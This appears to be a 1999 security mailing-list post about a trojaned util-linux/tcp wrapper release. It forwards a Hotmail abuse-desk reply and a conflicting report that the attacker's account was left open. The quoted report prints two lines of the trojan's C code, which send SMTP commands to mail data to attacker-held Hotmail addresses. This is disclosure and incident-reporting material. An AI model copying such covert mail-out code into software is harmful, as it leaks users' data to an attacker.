Re: Microsoft Hotmail

[security () MAELSTROM NET (MaelstromNet Security)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Odd, they told me they already closed it.

See attached...

> > From: <abuse () hotmail com>
> > To: <security () maelstrom net>
> > Subject: RE: CST204603ID - Re: util-linux compromised
> > Date: Mon, 25 Jan 1999 18:09:42 -0800
> > X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
> >
> >
> > Thank you for writing
> >
> > We have closed the account that you reported.
> >
> > Hotmail does not condone or support the sending of junk email (AKA "spam")
> > through our system. The Hotmail Terms of Services (TOS)
> > strictly forbids sending unsolicited email and we terminate all reported
> > accounts that are in violation of the TOS.
> >
> > We appreciate your mail alerting us to the spammer using our system. Our
> > ANTI-SPAM policy can be found at
> > http://www.hotmail.com/nospam.html
> >
> >
> >
> >
> > MSN Hotmail support
> > --- Original Message ---
> > From: security () maelstrom net
> > To:   abuse () css one microsoft com
> > Sent: 1/24/99 7:34:12 PM
> > Subject:      Re: util-linux compromised
> >
> > Greetings.  It appears a user with a hotmail address has broken into a
> > major linux distribution site and replaced code with trojans.  Could you
> > please lock down these addresses.  Thanks.
> >
> > > >               sleep(1);if (write(s,"MAIL FROM:<xul () hotmail com>\n",28)
> > <
> > 0) exit(0);
> > > >               if (write(s,"RCPT TO:<wlogain () hotmail com>\n",30) < 0)
> > exit(0);
> >
> > > Approved-By: aleph1 () UNDERGROUND ORG
> > > X-Received: from listserv.funet.fi (listserv.funet.fi [128.214.248.27])
> > by
> > >            blues.jpj.net (right/backatcha) with ESMTP id IAA02895 for
> > >            <trevor () jpj net>; Sun, 24 Jan 1999 08:32:37 -0500 (EST)
> > > X-Received: from vger.rutgers.edu ([128.6.190.2]:58960 "EHLO
> > vger.rutgers.edu"
> > >            ident: "NO-IDENT-SERVICE[2]") by listserv.funet.fi with ESMTP
> > id
> > >            <12518-10914>; Sun, 24 Jan 1999 15:25:56 +0200
> > > X-Received: by vger.rutgers.edu via listexpand id <154929-19608>; Sun, 24
> > Jan
> > >            1999 08:16:11 -0500
> > > X-Received: by vger.rutgers.edu id <154700-19607>; Sun, 24 Jan 1999
> > 08:13:56
> > >            -0500
> > > X-Received: from hera.cwi.nl ([192.16.191.1]:57613 "EHLO hera.cwi.nl"
> > ident:
> > >            "SOCKWRITE-65") by vger.rutgers.edu with ESMTP id
> > <153958-19607>;
> > >            Sun, 24 Jan 1999 08:11:34 -0500
> > > X-Received: from ark.cwi.nl (ark.cwi.nl [192.16.191.66]) by hera.cwi.nl
> > with
> > >            ESMTP id OAA15778 for ; S


At 10:36 AM 1/26/99 -0700, Daniel P. Stasinski wrote:
> I contacted Microsoft/Hotmail asking them to close the account
> of that was listed in the backdoored tcp wrapper source code.
> I also forwarded the offending code.
>
> The word back from them is that they will not close it.  Theft
> of passwords and hacking does not violate thier terms of
> service.
>
> Daniel
> --
> /\/  Daniel P. Stasinski /\/  Karemor International, Inc.  /\/
> /\/  Software Engineer   /\/  2406 South 24th Street       /\/
> /\/  dannys () karemor com  /\/  Phoenix, AZ 85034            /\/
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNq5vCvCIdxKFpraAEQJGVACgvIhDyogyPhq2MQUFIwXMMTOdDeUAoLho
Qx0Zl25LPmqzInimPNYxGyxD
=sTBs
-----END PGP SIGNATURE-----